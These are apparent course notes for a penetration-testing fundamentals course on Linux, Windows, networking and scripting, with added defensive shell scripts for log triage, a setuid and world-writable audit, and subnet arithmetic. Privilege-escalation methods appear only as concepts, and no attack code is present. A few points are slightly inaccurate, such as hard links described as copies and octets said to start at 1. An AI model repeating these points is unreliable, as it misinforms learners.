PEN 100 Notes


Linux Basics [Part I]


1. Linux is a Unix-like operating system kernel with a monolithic architecture.
2. Various distributions built on the Linux kernel are Debian, Ubuntu, Fedora,
Arch Linux, etc.
3. The command-line interpreter in Linux is known as the shell. Common shells:
sh: Bourne shell
bash: Bourne Again shell
ksh: Korn shell
zsh: Z shell (an extended Bourne shell)
4. Linux follows the Filesystem Hierarchy Standard (FHS), which defines how
files are organized on the system and therefore how we navigate it.
5. System enumeration: This is a fancy term for information gathering about
the system to better understand the machine we've attacked, often to
elevate our permissions.
6. Wildcard( * ) characters allow us to reference a large set of files at
once, and help manage files on the command-line (among other tasks).
7. The three most common commands used to locate files in Kali Linux are
find, locate, and which.
8. Linking files is like creating file shortcuts in other directories.
Soft link: just a reference to the original file (holds no data of its own).
Hard link: a mirrored copy of the original file (copies the data of the
original file).
9. Inode number is a unique number used to identify a file.
10. Each program in Linux has three data streams. STDIN(0), STDOUT(1),
STDERR(2).
11. Piping and redirection are means by which we may connect these
streams between different programs and files to direct data in ways we
want them to flow.
12. ">" writes to a file (overwriting the original if it exists), ">>" appends
to a file, "<" reads from a file, and "2>" writes errors (STDERR) to a file.
13. Use the output from one program as the input to a second program via
piping with the "|" symbol.
14. A regular expression (RegEx) is a sequence of special characters, or sets
of characters, that helps us search for data and match complex patterns.
15. grep, sed, cut and awk are regex-driven searching and text-manipulation
commands/tools.
16. The comm command compares two text files, displaying the lines that
are unique to each one, as well as the lines they have in common.
17. If a command needs to be run, but you don't need to interact with it for
a while and want to keep using the same terminal for other commands
while it executes, you can use &. The ampersand sends the command to the
background. This is part of Linux process management.
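As an added example (not from the original notes), the following script wires items 10 through 17 together on a constructed, inline auth-log sample: STDIN fed by printf, grep -E regex filtering, awk field extraction, sort | uniq -c counting, comm on two sorted lists, "2>" capturing STDERR, and & backgrounding. The path /nonexistent/auth.log is a deliberate placeholder used only to provoke an error.

```shell
#!/bin/sh
# Added example, not part of the PEN-100 notes: log triage with streams, pipes
# and the text tools from items 10-17. The log lines below are constructed.
SAMPLE_LOG='Mar 10 10:01:02 host sshd[100]: Failed password for invalid user admin from 203.0.113.5 port 51000 ssh2
Mar 10 10:01:04 host sshd[101]: Failed password for root from 203.0.113.5 port 51002 ssh2
Mar 10 10:01:09 host sshd[102]: Accepted password for alice from 198.51.100.7 port 40000 ssh2
Mar 10 10:01:15 host sshd[103]: Failed password for invalid user test from 203.0.113.9 port 51010 ssh2
Mar 10 10:02:01 host sshd[104]: Failed password for root from 203.0.113.5 port 51020 ssh2
Mar 10 10:02:07 host sshd[105]: Accepted password for root from 203.0.113.5 port 51030 ssh2'

# Failed logins per source IP, most frequent first. printf feeds STDIN of grep,
# grep -E keeps only matching lines, awk prints the field after "from",
# sort | uniq -c counts duplicates, sort -rn orders by count.
failed_by_ip() {
    printf '%s\n' "$SAMPLE_LOG" \
        | grep -E 'Failed password' \
        | awk '{ for (i = 1; i <= NF; i++) if ($i == "from") print $(i + 1) }' \
        | sort | uniq -c | sort -rn \
        | awk '{ print $2, $1 }'
}

# Distinct usernames for one outcome ("Failed" or "Accepted"). The username is
# the field just before "from" for both "for root from" and "for invalid user
# admin from", so one awk expression covers both log shapes.
users_by_result() {
    printf '%s\n' "$SAMPLE_LOG" \
        | grep -E " $1 password for " \
        | awk '{ for (i = 1; i <= NF; i++) if ($i == "from") print $(i - 1) }' \
        | sort -u
}

# Users seen in both lists: a successful login after failures is worth a look.
# comm needs sorted input files, so each list is written out first.
failed_then_accepted() {
    failed=$(mktemp); accepted=$(mktemp)
    users_by_result Failed > "$failed"
    users_by_result Accepted > "$accepted"
    comm -12 "$failed" "$accepted"    # -12 hides columns 1 and 2, leaving common lines
    rm -f "$failed" "$accepted"
}

# "2>" redirects STDERR: the error from a missing file lands in $errfile and
# never mixes with the STDOUT data a later pipe stage would consume.
stderr_lines_for_missing_file() {
    errfile=$(mktemp)
    grep -c 'Failed' /nonexistent/auth.log 2> "$errfile" || true   # placeholder path
    wc -l < "$errfile" | tr -d ' '
    rm -f "$errfile"
}

# & runs a job in the background while the shell moves on; wait collects it.
failed_by_ip > /dev/null &
wait
echo "Failed logins by IP:";    failed_by_ip
echo "Failed then accepted:";   failed_then_accepted
echo "STDERR lines captured:";  stderr_lines_for_missing_file
```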

Linux Basics [Part II]


1. Linux user account details are stored in the /etc/passwd file, whereas
password hashes are stored in the /etc/shadow file.
2. Three ways to lock a user account:
a. Using usermod -L username or passwd -l username.
b. Using chage -E to set an expiration date in the past.
c. Changing the default shell in /etc/passwd to /bin/false or /sbin/nologin.
3. The sudo command can be used to execute a command with elevated
privileges and can only be used by users in the sudo group.
4. It is possible to save the output of a command in a variable with the
following syntax: var_name=$(command)
5. The su command can be used to switch users: su -l username
6. We can use the chown command to change the ownership properties of a
file.
7. We can define rights for each category of users (u/g/o), by setting
them explicitly (with =), by adding (with +), or by subtracting (with -).
Eg: chmod u+rwx,g+rw,o-r file
8. The second way to represent rights is via an octal numeric
representation.
9. (Penetration Technique: Privilege Escalation) Two special file
permissions allow the current user to execute the file with the rights of
the owner [setuid] or within the context of the owner's group [setgid];
they are denoted by "s" or "S" in the permission string.
10. By changing the owner of a file and adding the +s modification to it, if
any user from the file's group executes the file, it will execute in the
owner's context, with the owner's effective user ID (EUID).
11. The sticky bit (symbolized by the letter "t") is a permission used for
temporary directories where everybody has write access but restricts
deletion of files so that only their owner or the owner of the parent
directory can delete them.
12. A Process is an instance of a running program and whenever we run a
program via our terminal, we begin a new process.
13. The quickest way to background a process is to append an ampersand
(&) to the end of the command to send it to the background immediately
after it starts.
14. The built-in jobs utility lists the jobs that are running in the current
terminal session, and fg returns a job to the foreground. Ctrl+Z is used
to suspend a job running in foreground which can then be resumed in
background using bg command.
15. One of the most useful commands to monitor processes on almost any
Unix-like operating system is ps (short for process status).
16. It is extremely valuable to know how to monitor files and commands in
real-time during a penetration test. Two commands that help with such
tasks are tail and watch.
17. apt (Advanced Package Tool) is a set of tools that manages packages
(applications): installing and removing applications, updating
packages, and even upgrading the entire system.
18. dpkg is the core tool used to install a package, either directly or
indirectly through APT. It does not require an Internet connection, but
dpkg will not install any dependencies that the package might require.
19. The Linux-based job scheduler is known as Cron. Cron makes it possible
to schedule the execution of tasks. These tasks are usually commands
and scripts associated with system maintenance.
20. If the Backup script (user_backup.sh) has weak permissions, we may be
able to leverage this to escalate our privileges.
21. Most Unix-like systems, as well as services running on them, produce
logs within the /var/log directory.
22. Logs are also an excellent troubleshooting tool. When some command or
action fails, logs can help us understand why the unexpected
phenomenon is happening.
23. The most prevalent tools to interact with disks and filesystems are free,
dd, du, df, and mount.
24. In Linux we have to mount a filesystem before we can use it; if we were
to insert a USB drive (for example), we would need to create an
associated location somewhere in the directory tree.
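As an added example (not from the original notes), the script below builds a throwaway directory tree containing the permission cases from items 7 through 11 (symbolic and octal chmod, setuid, setgid, sticky bit) plus the weak-permission backup script from item 20, then audits it the way a defender looks for escalation footholds. The file names helper, report and user_backup.sh are placeholders; nothing outside the mktemp directory is touched.

```shell
#!/bin/sh
# Added example, not part of the PEN-100 notes: a permissions audit covering
# items 7-11 (symbolic and octal modes, setuid/setgid, sticky bit) and item 20
# (a cron backup script with weak permissions). Everything lives under a
# temporary directory, so nothing on the real system is modified.

SCRATCH=$(mktemp -d)

# Fixtures: an empty file stands in for each "binary" or script.
build_fixture() {
    mkdir -p "$SCRATCH/bin" "$SCRATCH/cron" "$SCRATCH/shared"
    : > "$SCRATCH/bin/helper"
    : > "$SCRATCH/bin/report"
    : > "$SCRATCH/cron/user_backup.sh"
    chmod 4755 "$SCRATCH/bin/helper"               # octal: setuid + rwxr-xr-x
    chmod u=rwx,g=rxs,o=rx "$SCRATCH/bin/report"   # symbolic: setgid via "s" on the group
    chmod 1777 "$SCRATCH/shared"                   # sticky bit on a world-writable directory
    chmod 777 "$SCRATCH/cron/user_backup.sh"       # the weak-permission backup script
}

# Paths relative to $SCRATCH, sorted, so results are stable.
relative() { sed "s|^$SCRATCH/||" | sort; }

# setuid (4000) or setgid (2000) files run with the owner's or group's rights;
# every hit here should be a known, justified binary.
find_special() {
    find "$SCRATCH" -type f \( -perm -4000 -o -perm -2000 \) | relative
}

# World-writable files (other-write bit, 0002): if cron or root executes one of
# these, any local user can change what runs. This is the item 20 escalation path.
find_world_writable() {
    find "$SCRATCH" -type f -perm -0002 | relative
}

# Symbolic mode string as ls prints it: "s" in an execute slot marks setuid or
# setgid, "t" in the last slot marks the sticky bit. GNU stat first, BSD fallback.
mode_of() {
    stat -c '%A' "$1" 2>/dev/null || stat -f '%Sp' "$1"
}

cleanup() { rm -rf "$SCRATCH"; }

build_fixture
echo "setuid/setgid files:";   find_special
echo "world-writable files:";  find_world_writable
echo "helper mode: $(mode_of "$SCRATCH/bin/helper")"   # -rwsr-xr-x
echo "shared mode: $(mode_of "$SCRATCH/shared")"       # drwxrwxrwt
cleanup
```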

Windows Basics [Part I]


1. On Windows, the Administrator account belongs to the user with the
highest permissions. However, many Windows processes that require
elevated permissions run under the context of a non-user account called
NT AUTHORITY\SYSTEM.
2. Windows filenames are not case sensitive, so C:\Windows\System32 and
C:\Windows\SYSTEM32 would refer to the same file.
3. Linux stores information related to applications and its kernel in the /etc
and /proc directories respectively. Windows manages both application
and system configurations centrally in the Windows Registry.
4. Windows comes with three different command-line interfaces: cmd.exe,
PowerShell, and WMIC.
5. Windows PowerShell is built on the .NET framework and employs the use
of cmdlets to run administrative tasks. PowerShell can fully interface
with the Component Object Model (COM) and the Windows Management
Instrumentation (WMI)
6. Windows has the following equivalents of common Linux commands: ls->dir,
clear->cls, cp->copy, mv->move, rm->del, cat->type, touch->echo
7. \Roaming directory in \AppData is used for network-based logins for
roaming profiles and synchronizes the user's data when they login to the
computer.
8. \System, \System32, and \SysWOW64: These directories store dynamic-link
library (DLL) files that execute the core features of Windows and
the Windows API. \System stores 16-bit DLLs and is usually empty on
64-bit editions of Windows because 16-bit applications cannot run on
64-bit OSs. \System32 stores either 32-bit or 64-bit DLL files, depending on
whether a 32-bit or 64-bit edition of Windows is running. \SysWOW64 is
found only on 64-bit editions of Windows, and despite its name, stores
32-bit DLLs.
9. systeminfo.exe is a Windows binary capable of extracting detailed
configuration information about the system it is run on. It can also be
run against remote machines if provided the /s option.
10. The set command can also be used to temporarily change the value of an
environment variable in the context of the current shell. The setx
command can be used to change a value permanently by modifying the
registry.
11. Microsoft has developed a suite of tools that together help make up a
robust command-line environment for system administration, collectively
called the Sysinternals System Information Utilities. Note that
Sysinternals does not come with Windows by default, but we can
download it from Microsoft's website.
12. We can use the 2> operator to redirect all errors triggered by echo to a
specified file.
13. The rmdir command can also be used to delete a directory that has
content within it. To do so, we'll need to use the /S option. The fc
command compares the contents of two files.
14. The xcopy and robocopy commands are more robust versions of copy that
are often used in batch scripts. While xcopy has been deprecated,
robocopy is very helpful because it has a high tolerance for network
interruptions. It also has several other powerful features that are useful
for security auditing.
15. The mklink command is used to create a symbolic link on Windows and
supports the creation of both soft and hard links. To create a
soft symbolic link to a text file we can execute mklink with no additional
options, whereas for a hard link we use the /h option.
16. The main difference between a softlink and hardlink is that the hardlink
retains value even after the original file is deleted.
17. Three commands to search for files and strings are dir, tree, and forfiles.
One option of the dir command worth knowing is the /s option, which
allows us to search for any file in the given folder and any of its
subfolders.
18. In Windows the find command is used to search for a string of text. Just
like find, we can use findstr to search for a specific string. However, it
can also search for multiple strings at the same time.

Windows Basics [Part II]


1. The base command to create and manage users on a Windows system is
called net. We can use it to add, remove, and modify user accounts and
group membership on a local or networked machine. The net command
contains a series of subcommands that each perform a specific function.
2. Security principal is a subject that the operating system can opt to (or
not to) authenticate. They include automated accounts, threads,
processes, groups of users, and even parts of the OS itself and are
identified by Security Identifiers (SIDs).
3. An Access Control List (ACL) is generally a dictionary of trustees and
sets of permissions they've been assigned. In Windows, each element of
an ACL is an Access Control Entry (ACE). There are six types of ACEs,
and each ACE includes a SID, a set of access rights, and several flags
that each indicate different properties.
4. Windows has three accounts categories:
a. Administrator: User account designed for the system administrator to
manage the machine.
b. Guest: Lets non-users of the machine log on temporarily with
restrictive permissions.
c. System: Used by the OS to run services that need elevated
permissions
5. A local group is a set of accounts that can be assigned permissions on a
local machine. Two important groups for security are Administrators and
Remote Desktop Users. Any member of Administrators has permissions
equivalent to those of the Administrator account, and any member of Remote
Desktop Users can access the machine remotely if Remote Desktop.
6. User Account Control (UAC) is another security feature on Windows that,
in general, protects against malicious actions by forcing an active
human user to manually confirm administrative actions by means of a
prompt, or message box.
7. (Penetration Technique: Privilege Escalation) Windows comes with a
command to impersonate another user called [runas]. It can be used to
elevate privileges temporarily. Since runas can execute commands with
another user's permissions, it can be useful for attackers to attempt it
if they obtain low-level access to a machine.
8. The following is the basic set of permissions assignable to files and
directories:
a. Read
b. Write
c. Read & Execute
d. Modify
e. Full Control
f. List Folder Contents
9. Inheritance allows a parent entity to propagate attributes to its children.
By default, a particular file or folder inherits the permissions of the
folder it is contained within.
10. A process is the container in which a program runs and a thread is a
single running instance of that program. In Microsoft's analogy: The
thread is the thing happening, the process is the environment in which it
happens, and the program is the procedure that the thread executes.
11. Windows processes work in two modes:
Kernel mode: It is used for the most trusted operations that the OS itself
needs to execute.
User mode: It is used for majority of user programs and applications
running on the computer.
12. smss.exe: Session Manager is the first User mode process that's
started on a Windows machine. It is primarily responsible for mapping
out virtual address space. It is spawned by System twice: one instance
spawns winlogon.exe and csrss.exe and then exits.
13. winlogon.exe: Windows Logon is responsible for not only authenticating
users, but also for loading user profiles. In addition, it performs an
array of functions even after login.
14. csrss.exe: The Client Server Runtime Process is responsible for several
background functions. It begins the shutdown sequence when
terminated, and it is the parent of the process that eventually spawns
cmd.exe.
15. explorer.exe: Windows Explorer is responsible for rendering much of the
Windows GUI shell that the user interacts with. It governs the Windows
Start Menu, the Taskbar, and the System Tray.
16. wininit.exe: Windows Startup is responsible for triggering a crucial set
of User mode applications that must run to maintain the system's
stability and functionality.
17. Libraries are repositories of functions that can easily be imported into
other programs. Windows uses Dynamic-Link Libraries (DLLs), which are
themselves written in the same format as .exe files. DLLs essentially
allow a program to call upon already-written functionality instead of
needing to perform those functions itself.
18. The Windows Registry acts as a central database for the OS. Through the
Registry, we can access both system information and user information
and it contains the most critical system information.
19. The Windows Task Scheduler allows us to schedule computer programs or
scripts to run at pre-defined times or upon certain triggers. schtasks
command enables an administrator to create, delete, query, change, run
and end scheduled tasks on a local or remote system.
20. In terms of built-in utilities, Windows comes with the fsutil set of
programs that can manage drives.
21. A stream is a property of files under NTFS that essentially allows us to
store content within arbitrary sections of the file. The dir /R option
is useful for identifying Alternate Data Streams (ADS).

Networking Fundamentals
1. A network model is a conceptual framework that helps us understand
how we could organize communication between different devices. Once
we understand network models, we can implement various network
protocols, which describe how two or more entities (in this case,
machines) should communicate in practice.
2. There are two main reference models which describe how to connect
multiple devices. These two reference models are the OSI model (Open
Systems Interconnection) and the TCP/IP model.
3. A Protocol Data Unit (PDU) is the unit of information that is transmitted
at a certain layer. For example, flow control, the function of making
sure information gets to its intended destination, can be implemented at
several layers.
4. OSI Model consists of 7 layers:
Layer 7: At the very top of the model, the Application Layer defines how
a human or software can interact with a network.
Layer 6: The Presentation Layer is responsible for taking the data it
receives from the layer below it, and for rearranging it so the Application
Layer can present to a user.
Layer 5: The Session Layer implements protocols that initiate, maintain,
and eventually terminate multiple different connections between
computers.
Layer 4: The Transport Layer is largely (but not solely) responsible for
making sure that data gets from Host A to Host B in proper order and on
time.
Layer 3: The Network Layer, true to its namesake, is primarily
concerned with information traveling between two or more different
networks.
Layer 2: The Data Link layer is tasked with transferring information
between hosts that are physically connected on the same network.
Layer 1: Finally, the Physical Layer transfers raw data between a
physical machine and a physical transmission medium (like a wire).
5. The TCP/IP Model consists of four layers:
Layer 4: The Application Layer of TCP/IP can roughly be thought of as
similar to the combined Application, Presentation, and Session layers of
the OSI model.
Layer 3: The Transport Layer of TCP/IP attempts to answer the question
"What rules should we use to determine how machines should
communicate together regardless of the networks they happen to be on?"
Layer 2: The Internet Layer answers the question "What rules should we
use to define how information travels between networks?"
Layer 1: The Link Layer answers the question "What rules should we
use to define communication within the same physical network?"
6. To build an IP address, we take four octets and concatenate them to
form a 32-bit integer. For each of the four octets, a number between 1
and 255 is chosen. These values are called octets because 2^8 = 256.
An example of an IP address is 192.168.127.16
7. To refer to subnets more concisely, we can use something called
Classless Inter-Domain Routing (CIDR) notation. For example, the CIDR
notation for a network with a 255.255.255.0 subnet mask is "/24",
because there are 24 one-bits in the mask.
(11111111.11111111.11111111.00000000)
8. TCP is perhaps the most common Transport layer protocol. It enables
two-way communication by establishing a session between machines. A
TCP session is initiated by what's called the Three Way Handshake.
9. HTTP is the protocol of the web. It specifies rules for web clients to
retrieve content from web servers. HTTP most commonly uses port 80
whereas HTTPS uses port 443.
10. FTP allows a client to connect to, browse, send, and retrieve files to,
and from, a server. FTP is useful to know about from a security
perspective, because it enables means of discovering information that
may not be as heavily monitored or hardened as other network services.
11. SMTP is one of several application layer protocols dedicated to e-mail.
As with other protocols, SMTP describes a conversation or negotiation
between two parties: a sender and a receiver.
12. Wireshark is a flexible application that can be used to capture network
traffic. It is usually used via its streamlined Graphical User Interface
(GUI), but it also has a command line version called tshark.
13. Tcpdump is a command-line (or CLI) based network sniffer that is
surprisingly powerful and flexible despite the lack of a graphical
interface. It is by far the most commonly-used command-line packet
analyzer and can be found on most Unix and Linux operating systems.
14. The Address Resolution Protocol (ARP) is designed to associate Network
Layer addresses to Link Layer addresses. In this case, we're concerned
with IP addresses and MAC addresses. This allows switches to transmit
Ethernet frames to their intended destination devices on a Local Area
Network (LAN).
15. Ping is a fairly ubiquitous tool that repeatedly sends ICMP messages to a
target. This can allow us to test network connectivity by letting us know
if we're able to reach the destination. It also tests for the latency of
connectivity between the two machines.
16. The Dynamic Host Configuration Protocol (DHCP) helps make sure that
any new machines that join a network can negotiate with existing
machines to receive a properly configured and unique IP address.
17. Routing tables help machines determine how they can send information to
other hosts that they may not have a direct connection with.
18. Firewalls receive, and then drop or allow, incoming and outgoing traffic
to pass through a network based on rules defined by a system or
network administrator.
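As an added example (not from the original notes), the octet and CIDR arithmetic of items 6 and 7 carried out in plain shell arithmetic: converting a dotted address to its 32-bit integer and back, printing a mask in the dotted-binary form the notes use, counting the one-bits of a mask into a /prefix (rejecting a non-contiguous mask), and testing whether an address falls inside a given network. It goes slightly beyond the notes by handling any prefix length, not only /24.

```shell
#!/bin/sh
# Added example, not part of the PEN-100 notes: the octet and CIDR arithmetic
# of items 6 and 7 done in shell, so that "/24 because the mask has 24 one-bits"
# and "is this address in that subnet" become explicit bit operations.

# Dotted quad -> 32-bit integer: each octet is shifted into its byte position.
ip_to_int() {
    set -- $(printf '%s' "$1" | tr '.' ' ')
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# 32-bit integer -> dotted quad.
int_to_ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# Dotted quad -> dotted binary, the form the notes use to show the /24 mask.
to_bits() {
    set -- $(printf '%s' "$1" | tr '.' ' ')
    out=
    for octet in "$@"; do
        bits=; i=7
        while [ $i -ge 0 ]; do
            bits="$bits$(( (octet >> i) & 1 ))"
            i=$(( i - 1 ))
        done
        out="${out:+$out.}$bits"
    done
    echo "$out"
}

# Netmask -> prefix length: count the leading one-bits. Anything left once the
# run of ones ends means the mask is non-contiguous and therefore invalid.
mask_to_prefix() {
    m=$(ip_to_int "$1"); n=0
    while [ $(( m & 0x80000000 )) -ne 0 ]; do
        n=$(( n + 1 )); m=$(( (m << 1) & 0xFFFFFFFF ))
    done
    [ "$m" -eq 0 ] || { echo "invalid mask: $1" >&2; return 1; }
    echo "$n"
}

# Prefix length -> netmask: 32 one-bits shifted left by (32 - prefix).
prefix_to_mask() {
    int_to_ip $(( (0xFFFFFFFF << (32 - $1)) & 0xFFFFFFFF ))
}

# in_subnet ADDRESS NETWORK/PREFIX: exit 0 when ADDRESS & mask == NETWORK & mask.
in_subnet() {
    net=${2%/*}; prefix=${2#*/}
    mask=$(( (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF ))
    [ $(( $(ip_to_int "$1") & mask )) -eq $(( $(ip_to_int "$net") & mask )) ]
}

echo "192.168.127.16 as integer: $(ip_to_int 192.168.127.16)"   # 3232268048
echo "255.255.255.0 in binary:   $(to_bits 255.255.255.0)"
echo "255.255.255.0 is /$(mask_to_prefix 255.255.255.0)"
echo "/20 is $(prefix_to_mask 20)"                                # 255.255.240.0
in_subnet 192.168.127.16 192.168.127.0/24 && echo "192.168.127.16 is inside 192.168.127.0/24"
in_subnet 192.168.128.1 192.168.127.0/24 || echo "192.168.128.1 is outside 192.168.127.0/24"
```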

Bash Scripting Basics


1. A Bash script is a plain-text file that has a series of commands that are
executed as if they had been typed at a terminal prompt.
2. When encountering single quotes, Bash interprets every enclosed
character literally with no interpretation. When enclosed in double
quotes, certain characters such as "$", "'", and "\" in variables will
be processed in an initial substitution pass on the enclosed text.
3. Also, double quotes are the default when neither single nor double
quotes are specified for a string.
4. Bash interprets the "$" as the lead-in character that specifies a variable
and prints out the variable content. Eg: echo $variable
5. The backtick character is another special character and is used to embed
commands or program names in variables. This is known as command
substitution. Eg: user1=`whoami`
6. There's also another way to get command execution using Bash
scripting. We can place the command in parentheses "()", preceded
by a "$" character. Eg: user1=$(whoami)
7. A special convention in Bash for carrying out mathematical operations is
the use of double parentheses. If we attempt an operation and one of the
values is not numeric, Bash treats it as the numerical value zero.
Eg: echo $((firstNumber+secondNumber))
8. There's another way of evaluating mathematical operations, using the let
command. This command understands the four standard mathematical
operators, and also the double-plus operator which is used to increment
or add 1 to a value.
9. Bash reserves some special variable names, as shown in the table
below.

Variable Name   Description
$0              The name of the Bash script
$1 - $9         The first 9 arguments to the Bash script
$#              Number of arguments passed to the Bash script
$@              All arguments passed to the Bash script
$?              The exit status of the most recently run process
$USER           The username of the user running the script
$UID            The user identifier of the user running the script
$HOSTNAME       The hostname of the machine
$RANDOM         A random number
$LINENO         The current line number in the script
$$              The process ID of the current script

10. We can request user input while a script is running by using the read
command. Two of the most commonly used options include -p, which
allows us to specify a prompt, and -s, which makes the user input
silent. The latter is ideal for entering user credentials.
11. Conditional statements allow us to perform different actions based on
different conditions. The most common conditional Bash statements
include if, else, and elif.
12. Double parentheses (an alternative to the let keyword) are used for
arithmetic operations, whereas square brackets (an alternative to the test
keyword) are used for comparison operations.
13. Let's review the AND (&&) Boolean operator first, which executes a
command only if the previous command succeeds (or returns true or its
numerical representation of "0").
14. When used in a command list, the OR (||) operator is the opposite of
AND (&&); it executes the next command only if the previous command
failed (returned false or non-zero).
15. In Bash, the two most predominant loop commands are for and while.
16. In terms of Bash scripting, we can think of a function as a script within
a script. This becomes very useful when we need to execute the same
code multiple times in a script.
17. Two ways in which we can declare functions:
a. function function_name { commands... }
b. function_name() { commands...}
18. The use of the double redirect (<<) into cat with a string value means to
display the following text up until, but not including, the string value.
This avoids issuing lots of echo commands!
19. The -q option suppresses the output from grep, so only its exit status is
used. A further check can use the special -d form of test to verify the
existence of a folder.
20. The scope of a variable is simply the context in which it has meaning. By
default, a variable has a global scope, meaning it can be accessed
throughout the entire script. In contrast, a local variable can only be
seen within the function, block of code, or subshell in which it is
defined.
21. EOF stands for end of file: when the shell reaches this delimiter it
stops reading the here-document and continues executing the file.
cat <<EOF
text...
EOF
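As an added example (not from the original notes), one script that exercises the constructs from this section together: functions, a local variable, $#, $@ and $?, $(( )) arithmetic, [ ] tests with && and ||, a while loop with read, a for loop, and a quoted here-document. It classifies accounts from a constructed passwd-format sample (account names, UIDs and shells are invented; /etc/passwd is never read), applying the locked-shell rule from item 2 of Linux Basics Part II.

```shell
#!/bin/sh
# Added example, not part of the PEN-100 notes: one script that exercises the
# constructs from this section (functions, local scope, $# and $@, $?, $(( )),
# [ ] tests, && / ||, loops and a here-document) on a constructed passwd-style
# sample. A shell of /bin/false or nologin counts as locked. Nothing reads
# the real /etc/passwd.

# Here-document: the quoted 'EOF' delimiter keeps the text literal (no $ expansion).
read_sample() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup:x:34:34:backup:/var/backups:/bin/false
bob:x:1001:1001:Bob:/home/bob:/bin/zsh
svc:x:999:999:service:/srv:/sbin/nologin
EOF
}

# Accounts that can still get an interactive shell. The counter lives inside the
# { } group fed by the pipe, because a pipeline stage runs in a subshell and a
# variable set there is invisible afterwards; echoing from inside avoids that.
count_interactive() {
    read_sample | {
        count=0
        while IFS=: read -r _ _ _ _ _ _ shell; do
            case "$shell" in
                */nologin|*/false) ;;            # locked by shell
                *) count=$(( count + 1 )) ;;     # arithmetic with $(( ))
            esac
        done
        echo "$count"
    }
}

# Any account with UID 0 is root regardless of its name; more than one is a finding.
uid_zero_accounts() {
    read_sample | awk -F: '$3 == 0 { print $1 }'
}

# Exit status as the answer (0 = locked), so callers can use && / || or $?.
is_locked() {
    read_sample | grep -Eq "^$1:.*/(nologin|false)$"
}

# [ -x ] test plus && / ||: a login shell that is not executable cannot log in.
shell_status() {
    local path="$1"                           # local: scoped to this function
    [ -x "$path" ] && echo present || echo missing
}

report() {
    interactive=$(count_interactive)          # global by default
    cat <<EOF
Script: $0, $# argument(s): $@
Interactive accounts: $interactive
UID 0 accounts: $(uid_zero_accounts | tr '\n' ' ')
EOF
    for user in "$@"; do                      # loop over the function's arguments
        is_locked "$user"; rc=$?              # capture the exit status immediately
        [ "$rc" -eq 0 ] && echo "$user: locked" || echo "$user: active"
    done
}

report daemon alice
```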

Python Scripting Basics


1. Python variables can be converted from one data type to another in a
process we call typecasting.
2. If we know a value is contained in the list but don't know the index, we
can find it by using the list index() method.
3. We can also slice out the substrings from the full string by using the
index() function. To do this, we will add .index() to the variable tag,
and inside the index function, we will add the variables.
4. If we would like to add an item to our list, we can use the append()
method. Inversely, we can remove items from a list, in the same way,
using remove().
5. In Python, a dictionary is a data structure that contains one or more
key-value pairs. We can use curly brackets to define a new dictionary
and supply it with any initial key-value pairs.
6. Looping in programming is one way to iterate on a conditional state or
data structure. Python has two types of looping methods: for and while.
7. (Code Execution Vulnerability) Missing input validation is a very big
reason a lot of security vulnerabilities exist. Keeping in mind that a user
may enter special characters, characters that don't match the expected data
type, or even input that is thousands of characters long is essential to
writing code securely.
8. To open a file, we can use the open command, assigned to a variable. We
need to specify the file name and the mode. Eg: f = open("data.txt", "r")
9. For larger files, we can limit how much we are storing by only reading
one line of the file at a time using readlines() instead of read().
10. If we would like to write some data to a file, we can open the file like
before but in write (w) or append (a) mode depending on what we are
trying to accomplish.
11. To define a function, we use def followed by the name of our function.
The function definition line ends with parenthesis and a colon.
12. Sometimes, we may find that someone has already solved a complicated
task for us and provided their code as a Python module.
13. We can just import what we want and remove the need to reference a
module each time by using the from statement along with our import.
14. The requests module contains multiple functions within it. Some common
functions are: get, status_code, headers, encoding, text, and json.
15. Network sockets are endpoints for sending and receiving data across the
network. Simply put, they are the backbone of server/client
relationships.
16. There is a socket() function that has two parameters: AF_INET and
SOCK_STREAM. The AF_INET parameter specifies that the IP address will
be an IPv4 address. The SOCK_STREAM parameter specifies that the
socket will use a TCP connection.
17. Buffer size value sets the number of bytes that can be received from the
server. It can be changed to be lower or higher, up to near 64,000
bytes. Raising our buffer to that size would be impractical, and 1024
bytes is a fair amount to specify for typical usage.
18. A Web Spider is a script that downloads a web page, finds all of the links
on that page, recursively collects links on the website by following all
of the links, and displays them when complete.

PowerShell Scripting Basics


1. Scripting is an efficient way to perform or automate repetitive tasks,
and it can be used to complete tasks on a large scale. On the Windows
operating system, we can use batch scripts in batch files to automate
tasks.
2. While Bash and most other shell environments operate by ingesting and
returning text, PowerShell works with .NET objects.
3. Windows PowerShell Integrated Scripting Environment (ISE) is a more
powerful GUI version for running PowerShell commands and scripts.
4. A command is a program that is, or has been, compiled and can be
executed standalone. A cmdlet on the other hand, is a .NET class that
works on objects. Cmdlets are lightweight and don't have the overhead
that is required by a typical command.
5. Cmdlets are named by a verb and a noun separated by a hyphen. For
example, the Get-Help. It provides information about cmdlets, which is
similar to the manual, or man, command in Linux.
6. Tab completion, more formally known as command-line completion, is a
feature by which, as we type a program name, the shell attempts to guess
what we are trying to type and provides options.
7. An alias is a shortcut command that does the same thing as the main
command. For example, help is an alias for Get-Help. Syntax to create a
temporary session alias: Set-Alias -Name gh -Value Get-Help
8. When performing certain operations, like arithmetic operations, PowerShell
assumes our intentions based on the type of the first variable in the
expression.
9. One of the most important aspects of conditional statements and loops is
control flow. This is a concept where expressions are evaluated and the
program will continue to execute depending on the results of the
expressions.
10. If we get stuck in an infinite loop, one of the ways to terminate the
program is to send an interrupt signal by pressing the Ctrl+C
keyboard shortcut.
11. A property is a characteristic or attribute of an object, while a method
is an action that can be executed on an object. Every object has its
own properties and methods associated with it.
12. The Get-Member cmdlet displays the properties and methods of objects.
The pipeline(|) operator connects two commands by taking the output
from the first command and using it as input for the second command.
13. A similar yet more powerful way to interact with the properties of an
object is the Select-Object cmdlet. This cmdlet selects the properties of
one or more objects. The Get-Service cmdlet displays the installed
services on the system.
14. If the Where-Object command uses one condition, we can implement
either method. However, if we need two or more conditions, we have to
use a script block. Eg: Where-Object {$_.StartType -EQ "Automatic" -And $_.ServiceName -Match "^s"}
15. PowerShell providers make the data easier to access since it's
presented in a consistent way, similar to a file system drive. Providers
are typically included in modules, and are accessible after the module
has been loaded into the current session.
16. Scope modifiers are used to determine where a variable exists. Global
scope variables are available within the whole program, while local
